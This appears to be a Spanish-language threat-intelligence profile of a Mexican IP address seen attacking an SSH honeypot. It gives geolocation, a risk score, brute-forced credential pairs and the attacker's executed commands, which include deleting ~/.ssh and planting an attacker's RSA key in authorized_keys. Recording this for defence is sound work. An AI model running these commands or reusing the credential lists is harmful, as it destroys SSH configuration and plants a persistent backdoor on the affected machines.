TROYANOSYVIRUS
Amenaza ActivaALTO

201.149.53.243

Pais de Origen🇲🇽 Mexico
Primera Deteccion22/1/2026
Ultima Actividad21/4/2026
ISPMegacable Comunicaciones de Mexico, S.A. de C.V.
🎯
1,151
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
36
Malware

Geolocalizacion

Pais
🇲🇽 Mexico
Ciudad
Iztapalapa
ASN
AS14178
ISP
Megacable Comunicaciones de Mexico, S.A. de C.V.

Tipos de Ataque

ssh_telnet_honeypot

Puertos Atacados

22

Malware Asociado

Credenciales Intentadas

🔐345gs5662d34/345gs5662d34
4x
🔐root/123-qwerty
1x
🔐ob/ob
1x
🔐root/qwer1234QWER!@#$
1x
🔐root/014789
1x
🔐root/Abcd1234..
1x
🔐root/sistemas123
1x
🔐test/3245gs5662d34
1x
🔐root/reza@123
1x
🔐ubuntu/Qaz123!@#
1x
🔐root/qazwsx9999@@
1x
🔐root/Root1234567!@
1x
🔐bot/bot123456
1x
🔐root/69696969
1x
🔐ftpuser/Ftpuser22!
1x

Comandos Ejecutados

$Enter new UNIX password:6x
$ls -lh $(which ls)4x
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'4x
$uname -a4x
$w4x
$cat /proc/cpuinfo | grep name | wc -l4x
$cd ~; chattr -ia .ssh; lockr -ia .ssh4x
$whoami4x
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'4x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~4x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Puertos
211115060
Hostnames
service-static-149.53.243.mcm-telecom.com.mx

Evaluacion de Riesgo

65
/100
BajoMedioAltoCritico